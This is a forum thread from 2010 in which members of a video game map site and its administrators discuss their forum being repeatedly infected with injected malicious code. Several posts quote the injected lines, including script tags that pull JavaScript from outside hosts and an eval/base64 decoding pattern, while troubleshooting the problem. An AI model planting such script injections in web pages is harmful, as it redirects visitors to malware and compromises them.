VGMaps
November 22, 2017, 10:44:08 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
 
   Home   Help Search Login Register  
Pages: 1 [2] 3   Go Down
  Print  
Author Topic: My anti virus program keeps saying there's a virus here.  (Read 17156 times)
0 Members and 1 Guest are viewing this topic.
Peardian
Hero Member
*****
Offline Offline

Posts: 627


Busy busy


« Reply #15 on: May 03, 2010, 10:48:22 AM »

Unless you've reuploaded it, I can see yours just fine.


It seems almost all of the attachments in the Platinum thread are corrupted, so I'm wondering if it didn't corrupt almost all images.
Logged

MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!
Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #16 on: May 03, 2010, 11:12:11 AM »

Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
Logged

JonLeung
Administrator
*****
Offline Offline

Posts: 3129


« Reply #17 on: May 03, 2010, 11:22:56 AM »

I recently backed up the attachments (a few days ago - but don't think that's related - or at least I hope not), so shouldn't reuploading the contents of the "attachments" folder fix them?  When I get home I'll give that a shot.

Though I'm more concerned about something more critical or irreplaceable being corrupted, and if whatever's causing the corruption is still around.
« Last Edit: May 03, 2010, 11:24:43 AM by JonLeung » Logged
Peardian
Hero Member
*****
Offline Offline

Posts: 627


Busy busy


« Reply #18 on: May 03, 2010, 01:26:15 PM »

Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
Oh, NOW it's broken. I hate the way this browser uses its cache.
Logged

MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!
bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #19 on: May 03, 2010, 03:34:50 PM »

As long as the site is on a shared server, the possibility of this happening again is always going to exist. And its not a matter of forum software, just a matter of root security. The problem was that a script pasted eval(base64(decode()) into every page in the forum. I'm surprised it didn't go higher into the main site, but it may have just been targeting the forum itself.
Logged
Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #20 on: May 12, 2010, 12:08:41 AM »

It has happened again  Sad
Logged

Maxim
Hero Member
*****
Offline Offline

Posts: 972



« Reply #21 on: May 12, 2010, 02:20:13 AM »

The bottom of the page contains:

<script src="http://holasionweb.com/oo.php"></script>

...which serves some javascript that uses a cookie to redirect once to suitcase52td.net which is totally blocked for me...
Logged
bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #22 on: May 12, 2010, 06:26:20 AM »

Fixed
Logged
The Ultimate Koopa
Hero Member
*****
Offline Offline

Posts: 509


« Reply #23 on: May 20, 2010, 01:48:39 PM »

Danger: AVG Active Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: losotrana.com/js.php
Name: Virus found JS/Redir

That's what I'm getting now.
Logged
TerraEsperZ
Hero Member
*****
Offline Offline

Posts: 2225



« Reply #24 on: May 20, 2010, 02:03:27 PM »

Same thing for me. Every page on the forum causes Avast to report that trojan horse...
Logged

Current project that I really should try to finish:
-Drill Dozer (GBA)
-Sonic 3D Blast (Genesis)
-Naya's Quest (PC)
-Lilly Looking Through (PC)

Pending project:
-A ton of stuff that will never be finished
Revned
Hero Member
*****
Offline Offline

Posts: 1091



« Reply #25 on: May 20, 2010, 02:37:02 PM »

I'm of the opinion that the problem isn't that this site is on a shared server, but that something is attacking externally. None of this was happening until the captcha was changed, and only the forums are targeted. If the server admins are worth anything they keep each site in private directories.

[EDIT] Nevermind, it appears that it definitely is a problem with GoDaddy. Lots of other people with different software are experiencing this. I guess we'll just have to wait it out.

Just a thought -- if the base64_decode command is getting pasted at the very end of the php file, what if you (bustin98) just stick an exit() at the end? That way anything after that point will be ignored, should this happen again.
« Last Edit: May 20, 2010, 02:47:11 PM by Revned » Logged

bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #26 on: May 20, 2010, 06:31:01 PM »

Its at the beginning of the file. Wish there was something I could put in to kill it. I changed permissions on the files but that didn't do a thing, and it wouldn't if the source was above the basic web user. Need to just get off the shared server, or on one that has better security.
Logged
bustin98
Administrator
*****
Offline Offline

Posts: 330



« Reply #27 on: May 21, 2010, 10:19:28 PM »

Well, did a deep cleaning of the site, found a random file that may be the cause or a cause the infection. Got rid of it. I also renamed the cookie name, so sorry about causing everyone to have to log back in... Cheesy Seems the infection is self replicating and all it had to do is get in once. Every time someone hit an infected page, it ran through the site and added the code if it didn't already exist.

Maybe now things can go back to normal.??
Logged
marioman
Hero Member
*****
Offline Offline

Posts: 649


« Reply #28 on: September 17, 2010, 04:56:55 PM »

It's happened again.  The following script has been added to the forum code.

<script src="http://myblindstudioinfoonline.com/ll.php"></script>

Those without reliable virus protection beware.
Logged
Peardian
Hero Member
*****
Offline Offline

Posts: 627


Busy busy


« Reply #29 on: September 17, 2010, 06:32:23 PM »

Uh oh. For some reason, I'm not getting any kind of warning and nothing is happening. I hope this gets taken care of before something does.
Logged

MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!
Pages: 1 [2] 3   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.20 | SMF © 2013, Simple Machines Valid XHTML 1.0! Valid CSS!